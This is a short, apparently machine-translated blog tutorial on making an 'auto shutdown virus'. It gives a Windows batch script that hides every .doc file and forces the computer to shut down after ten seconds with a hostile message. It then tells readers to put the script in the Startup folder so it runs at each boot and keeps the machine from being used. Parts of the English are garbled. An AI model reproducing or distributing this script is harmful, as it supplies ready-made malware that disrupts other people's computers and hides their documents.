How to Make Auto Shutdown Virus
This time I will tell how to make auto shutdown virus, very easy in fact I'm sure you guys can make it. First you copy the batch scriptbelow and paste it in notepad and berinama and ending withexistence. bat (Example: Virusku.bat)
========================================
Echo off
cls
Dir>laporan.txt
Copy laporan.txt c:\
Del laporan.txt
Attrib +h *.doc/d/s
Shutdown -s -t 10 -c "The End Of Your Computer" -f
exit
=========================================
You can change the number 10 in-s-t 10-c, because it is the timewhere computers will soon be dead in 10 seconds. And you alsocan change the words "The End Of Your Computer" it's up to youwhat the message would be given. Remember when copied into notepad and given the existence of the bat, copy or cutand paste this virus in C: \ Documents and Settings \ All Users \Start Menu \ Programs \ Startup. (Note: Do not be practiced on a personal computer).
Good luck.
Tags : Tips and Trick Computer